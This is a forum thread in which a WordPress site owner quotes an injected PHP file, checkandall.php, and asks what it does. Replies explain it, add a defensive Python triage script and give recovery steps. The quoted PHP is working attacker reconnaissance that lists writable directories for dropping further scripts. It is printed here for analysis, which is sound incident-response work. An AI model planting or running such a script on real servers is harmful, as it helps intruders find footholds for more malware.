checkandall.php added to WordPress root directory
After logging into one of my WordPress sites today, the Sucuri plugin reported the following file added:
01/04/2015 - New file added: checkandall.php (size: 592)
This sits in the root of the server and contains the following code:
<?php
error_reporting(0);   // silence all PHP warnings/errors so nothing is logged or shown

// Recursively walk $folder, collecting "<dir>/*" for every directory that is
// writable and contains at least one regular file.
function getlistfiles($folder, &$all_files) {
    $fp = opendir($folder);
    while ($cv_file = readdir($fp)) {
        if (is_file($folder . "/" . $cv_file)) {
            if (is_writable($folder)) {
                $all_files[] = $folder . "/*";   // one entry per file; deduplicated below
            }
        } elseif ($cv_file != "." && $cv_file != ".." && is_dir($folder . "/" . $cv_file)) {
            getlistfiles($folder . "/" . $cv_file, $all_files);   // recurse into subdirectory
        }
    }
    closedir($fp);
}

$all_files = array();
getlistfiles("/var/sites/w/www.mydomain/public_html/", $all_files);
$result = array_unique($all_files);
print_r($result);   // dump the list of writable directories into the HTTP response
?>
Can someone with more PHP experience please explain what this is doing? I assume it's a file that has been injected to monitor the rest of the WordPress site.
Other actions that concern me:
01/04/2015 - Plugin deleted: PHP Code for Posts (v1.2.0; php-code-for-posts/phppostcode.php) - not actioned by me
01/04/2015 - Plugin deactivated: Sucuri Security - Auditing, Malware Scanner and Hardening - not actioned by me
01/04/2015 - Media file added; identifier: 328; name: maink.php; type. - not actioned by me
01/04/2015 - Plugin installed: maink.php - not actioned by me
Luckily, my host does daily, offsite backups, so I can restore. I'm curious to understand how this happened and what the effect of the hack would be.
This script is getting a list of the files in the directories under a specific base directory ("/var/sites/w/www.mydomain/public_html/" in this case), and prints a list of the writable directories to the screen. The attacker can use this to find places to upload new scripts to, and use them to perform further attacks.
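A defender-side counterpart to the injected script, added here as an example (it is not code from the original post, from Sucuri, or from WordPress): it answers the same question the attacker's PHP asks, which directories the running user can write to, and then runs the two checks a responder wants next given the log entries in the question: PHP files sitting under the media-library tree (where maink.php was added), and files modified within a recent window. The sample site tree it builds is constructed for the demo; the wp-content/uploads path, the list of PHP suffixes and the 24-hour default window are assumptions.

```python
"""Triage a WordPress document root after an injected-file alert.

Example code added to this thread, not from the original post.  Sample
tree, paths and time windows are assumptions made for the demonstration.
"""
import os
import shutil
import tempfile
import time

# Suffixes a typical PHP handler executes; whether .phtml/.php5/.phar are mapped
# to PHP on a given server is an assumption to verify in its web-server config.
PHP_SUFFIXES = (".php", ".phtml", ".php5", ".phar")


def rel(root, path):
    """Path relative to root, with forward slashes, so reports are portable."""
    return os.path.relpath(path, root).replace(os.sep, "/")


def writable_dirs(root):
    """Directories under root the *current* user may write to.

    Same question as checkandall.php, with two differences: a writable
    directory is reported even if it holds no regular files, and the path is
    reported as-is rather than as "<dir>/*".  Run it as the web-server user
    (e.g. sudo -u www-data) to see exactly what the attacker's PHP would see.
    """
    found = []
    for dirpath, _dirnames, _filenames in os.walk(root):
        if os.access(dirpath, os.W_OK):
            found.append(rel(root, dirpath))
    return sorted(found)


def php_in_uploads(root, uploads="wp-content/uploads"):
    """PHP files under the media-library tree, which should only hold media."""
    base = os.path.join(root, uploads)
    hits = []
    for dirpath, _dirnames, filenames in os.walk(base):
        for name in filenames:
            if name.lower().endswith(PHP_SUFFIXES):
                hits.append(rel(root, os.path.join(dirpath, name)))
    return sorted(hits)


def recently_modified(root, window_seconds, now=None):
    """Files whose mtime falls within the last window_seconds.

    Attackers can reset mtimes (touch -r), so an empty result is not proof
    of a clean tree; it is a quick first cut, not a verdict.
    """
    now = time.time() if now is None else now
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                mtime = os.lstat(path).st_mtime
            except OSError:
                continue
            if now - mtime <= window_seconds:
                hits.append(rel(root, path))
    return sorted(hits)


def triage(root, window_seconds=24 * 3600, now=None):
    """Run all three checks and return them as one report."""
    return {
        "writable_dirs": writable_dirs(root),
        "php_in_uploads": php_in_uploads(root),
        "recent_files": recently_modified(root, window_seconds, now),
    }


def build_sample_site(root, now):
    """Constructed fixture mirroring the thread: a month-old install plus a
    dropper in the document root and a PHP file slipped into the media library."""
    old = now - 30 * 24 * 3600
    for path, mtime in [
        ("index.php", old),
        ("wp-config.php", old),
        ("wp-content/plugins/example-plugin/example.php", old),
        ("wp-content/uploads/2015/03/photo.jpg", old),
        ("checkandall.php", now - 60),
        ("wp-content/uploads/2015/04/maink.php", now - 120),
    ]:
        full = os.path.join(root, path)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("<?php // constructed sample content\n")
        os.utime(full, (mtime, mtime))


def demo_triage():
    """Build the fixture in a temp dir, triage it, clean up, return the report."""
    now = time.time()
    root = tempfile.mkdtemp(prefix="wp-triage-")
    try:
        build_sample_site(root, now)
        return triage(root, window_seconds=3600, now=now)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for key, items in demo_triage().items():
        print(key)
        for item in items:
            print("  " + item)
```

Point triage() at the real document root and run it as the web-server user: os.access() reports the privileges of whoever runs the script, so a run as your shell account says nothing about what PHP could write. The uploads check is the one that would have caught maink.php, and blocking PHP execution under wp-content/uploads at the web-server level removes that whole class of drop.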
It looks like they got administrative access to the WordPress site and are using it to upload other scripts to do more damage. The plugin that was installed opens further vulnerabilities for the attacker to exploit. Take the server offline, restore from backups, change the database and WordPress admin credentials, and update WordPress to the latest version.
Take a look at this: http://www-personal.umich.edu/~markmont/awp/